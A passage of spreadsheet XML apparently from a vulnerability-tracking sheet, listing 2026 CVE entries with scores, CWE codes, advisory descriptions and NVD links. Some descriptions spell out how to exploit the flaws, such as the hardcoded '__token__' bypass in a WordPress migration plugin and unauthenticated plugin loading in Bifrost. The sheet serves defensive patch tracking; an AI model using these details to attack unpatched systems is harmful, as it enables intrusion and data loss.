          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, the REST API did not properly enforce the scope of project- and workspace-scoped teams, allowing a user to submit invalid team configurations through the API. By assigning projects to a team via these unvalidated requests, a user could grant access to projects they were not authorized to see or manage. This could expose private projects and permit translation, repository, and project-management operations outside the user's intended permission scope. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55228</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64679</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>Atlantis is a self-hosted golang application that listens for Terraform pull request events via webhooks. From 0.19.8 until 0.45.0, Atlantis does not consistently validate user-controlled workspace values supplied through accepted repository-level atlantis.yaml configuration or authenticated /api/plan input before joining them into local workspace paths. Traversal segments can escape the intended per-pull workspace directory and cause clone preparation or other working-directory code paths to call os.RemoveAll, os.MkdirAll, or related filesystem operations on out-of-bounds directories before Terraform rejects the invalid workspace name. This can create, delete, or reuse writable paths with the privileges of the Atlantis process, causing integrity loss or denial of service. This issue is fixed in version 0.45.0.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64679</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65181</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>Insufficient authorization of Data Source tables in Impala 2.7-4.5 allows a client with privileges to upload a file to remote storage and create a table to execute arbitrary Java code.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65181</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71809</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass via Hardcoded Master Verification Code vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote unauthenticated attackers to log in as any user, merchant, or administrator.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71809</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73334</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>apache:parquet</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>Potential problem for users of the org.apache.parquet.crypto.keytools package in Apache Parquet, versions 1.12 to 1.18. 
This package enables users to encrypt Parquet files via an envelope encryption mechanism that wraps (encrypts) data keys via a Key Management Service (KMS). 
On the reader side, the KMS URL can be application-controlled or file-controlled.
If the user does not leverage application control for this parameter, a file-controlled KMS URL is forwarded to a pluggable KmsClient implementation. 
If the pluggable implementation does not perform host validation, a KMS token can be sent to a malicious host set by an attacker in the file.
Before the problem is fixed, users are recommended to leverage application control for KMS URL parameter in readers (versions 1.12-1.18).
After the problem is fixed (presumably in version 1.19), the upgrade will disable file-controlled KMS URL by default. Users of the KMS URL parameter 
will have two options then: leverage application control for KMS URL parameter in readers, or enable file-controlled KMS URL (via a new app parameter).
The latter option will explicitly require (in the new parameter documentation) to validate the KMS URL and use authentication in the custom implementation of the KMS client plug in.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73334</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75464</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>OneNav 1.2.4 contains an authenticated arbitrary file deletion vulnerability via import_link().</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75464</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76009</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 3.9.8 via the `NCWM_Kitconnect::run()` function. This is due to the plugin registering the `/wp-json/next_cart/v1/migration` REST route with `permission_callback` set to `__return_true` and relying on a hardcoded fallback value of `__token__` in `get_option('nextcart_token', '__token__')` when the `nextcart_token` option has not yet been written to the database. This makes it possible for unauthenticated attackers to bypass authentication to the migration endpoint by supplying the literal string `__token__` as the token, gaining access to privileged handlers that pass attacker-controlled SQL directly to `$wpdb-&gt;query()` and `$wpdb-&gt;get_results()` — enabling arbitrary SQL execution including administrator account creation — and pass an attacker-controlled path to `unlink()`, enabling arbitrary file deletion and full site takeover. The hardcoded fallback is reachable whenever the `nextcart_token` option has not yet been populated, which occurs after WP-CLI, network, or programmatic plugin activation without a subsequent authenticated `wp-admin` visit, as token generation is deferred to `admin_init` via `register_settings()`.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76009</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77317</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions from 3.88 through 4.39, the SFTP server evaluates configured path permissions with a literal string-prefix comparison, so a user scoped to a path is also granted the same access to any sibling path whose name merely begins with the same characters. A user granted access to /tenants/alice therefore also matches /tenants/alice-archive, /tenants/alice2, and similar siblings, because the check does not require a path-component boundary. An authenticated low-privilege SFTP user with a root home directory and narrow path permissions can thereby cross the configured ACL boundary to read another tenant's files, and to overwrite them if granted write, all through the documented SFTP service with its own valid credentials. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77317</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77567</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. Prior to versions 4.12.0 and 5.7.0, incorrect challenge-form required-field handling allows app-based multi-factor authentication to be bypassed when recovery codes are enabled. Email-based multi-factor authentication is not affected. This issue is fixed in versions 4.12.0 and 5.7.0.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77567</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78839</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in AppNitro MachForm v30 allows attackers to execute arbitrary code via uploading a crafted .phar file.</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78839</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81891</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, checkExtractItems() in php/elFinderVolumeDriver.class.php calls mimetypeInternalDetect() without passing the result through mimeTypeNormalize(). Because the .phtml, .phar, .php5, and .php3 extensions are absent from mime.types, the staticMimeMap entries that map them to text/x-php are not applied, and allowPutMime() permits extraction even when uploadDeny blocks text/x-php. An attacker with ZIP upload permission can extract PHP-executable files into a web-accessible files/ directory and achieve remote code execution when the server executes those extensions. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81891</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81892</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>EasyAdmin is a fast and modern admin generator for Symfony applications. From 4.0.0 until 4.29.16 and 5.5.1, EasyAdmin serves all backend requests through a single dashboard route and, for custom actions (Action::linkToRoute() and MenuItem::linkToRoute()), swaps the executed controller based on the routeName query parameter on the kernel.controller event. The swap happens after Symfony's security firewall has already evaluated access_control against the original dashboard URL, and the routeName value was not validated. As a result, a path-based access_control rule protecting the target route was never evaluated, so a low-privilege backend user who can reach a single EasyAdmin URL and knows a target route's name can execute that route's controller, bypassing the path-based rule. Only path-based protections are bypassed. Routes whose controller enforces its own authorization with #[IsGranted] or denyAccessUnlessGranted() remain protected because those checks are recomputed against the swapped-in controller. This issue is fixed in versions 4.29.16 and 5.5.1.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81892</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.10.0, httpcore2 fails to start TLS in src/httpcore2/httpcore2/_sync/socks_proxy.py and src/httpcore2/httpcore2/_async/socks_proxy.py when the remote origin uses wss through a SOCKS5 proxy because the TLS upgrade condition only recognizes https. HTTPX2 exposes the flaw through Client.websocket() and AsyncClient.websocket() from 2.6.0 through 2.9.1, so the opening handshake, query parameters, Authorization headers, cookies, and subsequent frames can cross the proxy path in plaintext without certificate verification. An attacker controlling or observing that path can read or modify traffic and impersonate the WebSocket server. This issue is fixed in httpcore2 2.10.0 and HTTPX2 2.10.0.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>reefs@jfrog.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K383" s="5" t="inlineStr"/>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86479</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18788, 
2026.1.14055, 
2025.3.161254 missing authorisation allowed access to restricted REST API resources via IDOR</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86479</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87016</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-287</t>
        </is>
      </c>
      <c r="R385"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S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87016</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
